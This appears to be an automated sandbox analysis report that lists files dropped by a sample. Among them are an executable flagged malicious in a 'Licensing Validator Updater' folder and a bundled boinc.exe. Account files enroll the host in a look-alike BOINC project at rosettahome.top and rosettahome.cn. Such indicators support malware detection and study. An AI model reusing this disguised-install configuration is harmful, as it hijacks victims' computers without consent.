                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bietm41g.aq0.ps1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3lyodiw.mss.ps1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlpcwpew.siq.psm1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehlluklo.ok2.ps1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5cebk4p.ydo.psm1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaxfdn5h.3gr.psm1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppgjvy4t.esi.ps1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1glbk4n.lhb.ps1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhjreyot.cz0.psm1

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                                                                                                                                                      MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                                                                                                                                                      SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                                                                                                                                                      SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpaddon

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):453023
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997718157581587
                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:tESTeqTI2r4ZbCgUKWKNeRcPMb6qlV7hVZe3:tEsed2Xh9/bdzZe3
                                                                                                                                                                                                                                                                                                                                                      MD5:85430BAED3398695717B0263807CF97C
                                                                                                                                                                                                                                                                                                                                                      SHA1:FFFBEE923CEA216F50FCE5D54219A188A5100F41
                                                                                                                                                                                                                                                                                                                                                      SHA-256:A9F4281F82B3579581C389E8583DC9F477C7FD0E20C9DFC91A2E611E21E3407E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:06511F1F6C6D44D076B3C593528C26A602348D9C41689DBF5FF716B671C3CA5756B12CB2E5869F836DEDCE27B1A5CFE79B93C707FD01F8E84B620923BB61B5F1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:PK.........bN...R..........gmpopenh264.dll..|.E.0.=..I.....1....4f1q.`.........q.....'+....h*m{.z..o_.{w........$..($A!...|L...B&A2.s.{..Dd......c.U.U..9u.S...K.l`...../.d.-....|.....&....9......wn..x......i.#O.+.Y.l......+....,3.3f..\..c.SSS,............N...GG...F.'.&.:'.K.Z&.>.@.g..M...M.`...*.........ZR....^jg.G.Kb.o~va.....<Z..1.#.O.e.....D..X..i..$imBW..Q&.......P.....,M.,..:.c...-...\......*.....-i.K.I..4.a..6..*...Ov=...W..F.CH.>...a.'.x...#@f...d..u.1....OV.1o}....g.5.._.3.J.Hi.Z.ipM....b.Z....%.G..F................/..3.q..J.....o...%.g.N.*.}..).3.N%.!..q*........^I.m..~...6.#.~+.....A...I]r...x..*.<IYj....p0..`S.M@.E..f.=.;!.@.....E..E....... .0.n....Jd..d......uM.-.qI.lR..z..=}..r.D.XLZ....x.$..|c.1.cUkM.&.Qn]..a]t.h..*.!.6 7..Jd.DvKJ"Wgd*%n...w...Jni.inmr.@M.$'Z.s....#)%..Rs..:.h....R....\..t.6..'.g.........Uj+F.cr:|..!..K.W.Y...17......,....r.....>.N..3.R.Y.._\...Ir.DNJdM... .k...&V-....z.%...-...D..i..&...6....7.2T).>..0..%.&.

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5900128
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.681603016700632
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:6+2pAHOueLXU0GbPaJXlr99CvGisAbPwCWTxvXXE+NKTyqp+:6JAHOueLXfCPaJXlr99Cvt3b4CYxvXXV
                                                                                                                                                                                                                                                                                                                                                      MD5:760F00E30887017CDEA9809FD1C38E52
                                                                                                                                                                                                                                                                                                                                                      SHA1:B09271E96FF73B86BD54489FBAE1C224369A8BC8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:91E405E8A527023FB8696624E70498AE83660FE6757CEF4871CE9BCC659264D3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:C0AAE4972748EF1E522B1B8230AB5A3A538AB4CC0F19773B359C4BC0CCB6357DC6D6F51913CB1B64F682595D9C8E6A1F5C8D60EB13A264BE2AA9E453FF1B5CCB
                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............ln..ln..ln...m..ln...k.-ln...j..ln.<..ln.<.j..ln.<.m..ln.<.k..ln...o..ln..lo..mn.....ln.....ln..ln..ln...j..on...k..ln....ln..l...ln...l..ln.Rich.ln.........................PE..d....Pf.........."....'..@...!......`#........@..............................b.....C.[...`...................................................Q.,....P^.@.....Z.Dq....Y.`'...`a.`....4O.T....................6O.(...p3O.@.............@..............................text...|.@.......@................. ..`.rdata...Q....@..R....@.............@..@.data...t.... R.......R.............@....pdata..Dq....Z..r....R.............@..@_RDATA.......0]...... U.............@..@.rsrc...@....P^......2V.............@..@.reloc..`....`a......<Y.............@..B................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\Licensing Validator Updater.zip

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2388536
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.995991707115608
                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:LvcIU6QFQzBq3nDlZAJ3j7QONdApLpDRxE7L0FjcNl7TcYna2hMuk2SVbNq:LvTkFh5Mj7jNi3EEiRcYnnXk2Sfq
                                                                                                                                                                                                                                                                                                                                                      MD5:5C56DA1927A0C85BE657E863A2675822
                                                                                                                                                                                                                                                                                                                                                      SHA1:15E037331B28C347CF6E2E651604EF2B5C741765
                                                                                                                                                                                                                                                                                                                                                      SHA-256:187DC7454A18AF3A4DD7D386E1CF7AB522664D8B6E30DDC2DAE5204403BC5504
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D36997D4E793C989B0968591947295A4B42E206FDEDE635568F23CDC9EA9182BEB3166FC779E83B5D12A27C7A2113A2B6CA388C5BF1515B6FDC6842D4A6B22BE
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:PK...........X....2n$.`.Z.....boinc.exe..yXT.....1.&"0..u.a.a.a..`......Z.+A..*.Z7o.b.5.4.6E.7IoW...m...!..4.......3:=..o......{.......;..qO3.0...~x.a:...27~...fH..!.....w......y.a~...&.1L.<w.F......s...9.M7yz.2.sl.d..c.........n...5.mg.v.m...-..vV.Y...z.m.n...k..:.....rQ.......-<9.W...Y.....w..F.......z.4..n.fN...8.{M).L[4....N...L.sk.!1.z.....X.H...v.n....1L.tH.2C. ..~...N.F..b...[.$..j&0V. .y.c[...n,3)...4......f....j&.l.W.@.k..yn...ej....l.z...swW.1..M..&7Nf..ZotN..l.W...j......c.h..RG..i....9..2.`.jg.Xg+./.!y.I...0>`k........s.r........7.A..9e.m.X.]1....5.h....)`.m6cl.C..sM.{..l..e......2.]nm.......k.4..G...b...>.mZw6.e..`.g.gev.6.}7./V..Vo.....#.N....9........l.....Cu8....M.7.Ix..g....Z...../..=.V.6.!..?>..y..i.A...1. ...9E..t!..4c.E....g.p.lr6...{N..t.....W.._.N..5.o...........[..Y\.....o.X..M.H=8...^.a..u..u....-...g'.?..K.]=,.GW^...7..zc,hd.m.L....$m@.3...mK3....:...l.......k#.!8.?.oL. .w....^7.3.........d$>?.=Hv{...

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\account_rosetta.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):240
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.507054532015214
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:8AfiM5xlhpw3fCNAZMQAG+eXKlLAGd7G19td7GVdJ:8eiufXw3qSZMQAG+eMLAGUtgdJ
                                                                                                                                                                                                                                                                                                                                                      MD5:3A2997418EDDAC7083B06B4EAE2CF413
                                                                                                                                                                                                                                                                                                                                                      SHA1:AEB63D04B573AE112D1DB79723D51B97FE7B30A0
                                                                                                                                                                                                                                                                                                                                                      SHA-256:0C2A61F8E1202100185822073CD22CE50F27C94C8EC189545627347405E92FEC
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B0AD25A7742364013990062967BD406A47DE860F0FF709EB531128C1B00ECC2B1B5E84C8C551603A308A9AFBB9C3ACDF9255EA082987C99DD5B56307E8D99822
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<account>..<master_url>http://rosettahome.top/rosettahome/</master_url>..<authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>..<project_name>rosettahome</project_name>..<project_preferences> </project_preferences>..</account>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\account_rosettahome.cn_rosettahome.xml (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):938
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.596457271252631
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:c23hSZMAkRA/oAUjDbJv4jFW1YahjyOeJ:RxSpd/oA4vL1YaUd
                                                                                                                                                                                                                                                                                                                                                      MD5:2D2869CF40771468F523051ED737CB33
                                                                                                                                                                                                                                                                                                                                                      SHA1:2110C8A839EF0509FB3BEC0E8967C3281C86A17E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:191E62287F8136AEAED806639F7FFFCBA7404575C5AF12108582831200450AF9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:DCEE37CCB813D156210BC7053E5E57C06175C64A3706205F1F17B73E698400E2EE1FE7738EA6E638829F3AD3BF5A9F3731EA4AA3DE7AAB6B6EAE923D3E3F80B9
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<account>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>.. <project_name>rosettahome</project_name>..<project_preferences>..</project_preferences>..<gui_urls>.... <gui_url>.. <name>Message boards</name>.. <description>Correspond with other users on the rosettahome message boards</description>.. <url>http://rosettahome.cn/rosettahome/forum_index.php</url>.. </gui_url>.. <gui_url>.. <name>Your account</name>.. <description>View your account information</description>.. <url>http://rosettahome.cn/rosettahome/home.php</url>.. </gui_url>.. <gui_url>.. <name>Your tasks</name>.. <description>View the last week or so of computational work</description>.. <url>http://rosettahome.cn/rosettahome/results.php?userid=1</url>.. </gui_url>.. ..</gui_urls>..</account>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\account_rosettahome.top_rosettahome.xml (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
